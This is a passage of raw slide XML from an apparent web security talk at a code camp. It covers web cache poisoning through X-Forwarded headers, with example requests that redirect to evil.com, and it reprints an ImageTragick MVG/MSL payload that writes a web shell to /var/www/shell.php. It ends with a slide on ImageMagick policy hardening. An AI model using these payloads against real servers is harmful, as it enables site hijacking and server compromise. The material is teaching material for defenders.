                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Keyed and Un-keyed input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/images/lolcatz.jpg?v=1.2</a:t>
            </a:r>
            <a:r>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>User Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mozilla/5.0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user=value</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-For:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> www.fubar.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Special Thanks: James Kettle https://www.youtube.com/watch?v=j2RrmNxJZ5c</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ommon Injection Headers:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19049" y="546196"/>
            <a:ext cx="12966701" cy="8089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300">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Common Injection Headers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="6">
              <a:defRPr sz="3300">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Original-Url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="3300">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="3300">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-For</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="3300">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="3300">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-Scheme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="3300">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="3300">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>many others..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr sz="3500">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Consider a universal https redirector.  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:t> if the redirector respects </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Forwarded</a:t>
            </a:r>
            <a:r>
              <a:t> headers (many do) and they are using a cache, like cloud flair or varnish, we can craft a universal redirect for any page…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ET /js/jquery.js?v=1 HTTP/1.1   HTTP/1.1 302 Found…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25400" y="1879599"/>
            <a:ext cx="13055601" cy="553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C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/js/jquery.js?v=1</a:t>
            </a:r>
            <a:r>
              <a:t> HTTP/1.1   HTTP/1.1 302 Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Host: business.pintrest.com      Location: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/js/jquery.js</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/js/jquery.js?v=1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Host: business.pintrest.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-For: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF767A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-Scheme: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/js/jquery.js?v=1</a:t>
            </a:r>
            <a:r>
              <a:t> HTTP/1.1 HTTP/1.1 302 Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Host: business.pintrest.com    Location: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/js/jquery.js</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="C8E059"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="HTTPS Redirect Poisoning"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679958" y="216461"/>
            <a:ext cx="11644885" cy="1192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C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>HTTPS Redirect Poisoning</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ory@bitslip6.com…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25400" y="183054"/>
            <a:ext cx="13055601" cy="50948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cory@bitslip6.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="6300">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Thanks for coming to Boise Code Camp!!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Moving Files…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176780" y="25400"/>
            <a:ext cx="12651241" cy="8750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Moving Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>File_Move.mvg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>push graphic-context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>viewbox 0 0 640 480</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>image over 0,0 0,0 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msl:/tmp/msl.txt</a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>popgraphic-context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>/tmp/msl.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;read filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/tmp/image.gif</a:t>
            </a:r>
            <a:r>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;write filename="/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var/www/shell.php</a:t>
            </a:r>
            <a:r>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6300"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ImageMagick supports methods for reading from URL (SSRF), File Removal, and Local File Read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6300"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://www.imagetragick.com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Protecting Your Servers…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282538" y="101600"/>
            <a:ext cx="12439725" cy="7607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6400">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Protecting Your Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify:</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/ImageMagick/policy.xml</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5200"/>
              </a:lnSpc>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;policymap&gt;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EPHEMERAL</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URL</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HTTPS</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MVG</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MSL</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TEXT</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SHOW</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WIN</a:t>
            </a:r>
            <a:r>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5200"/>
              </a:lnSpc>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
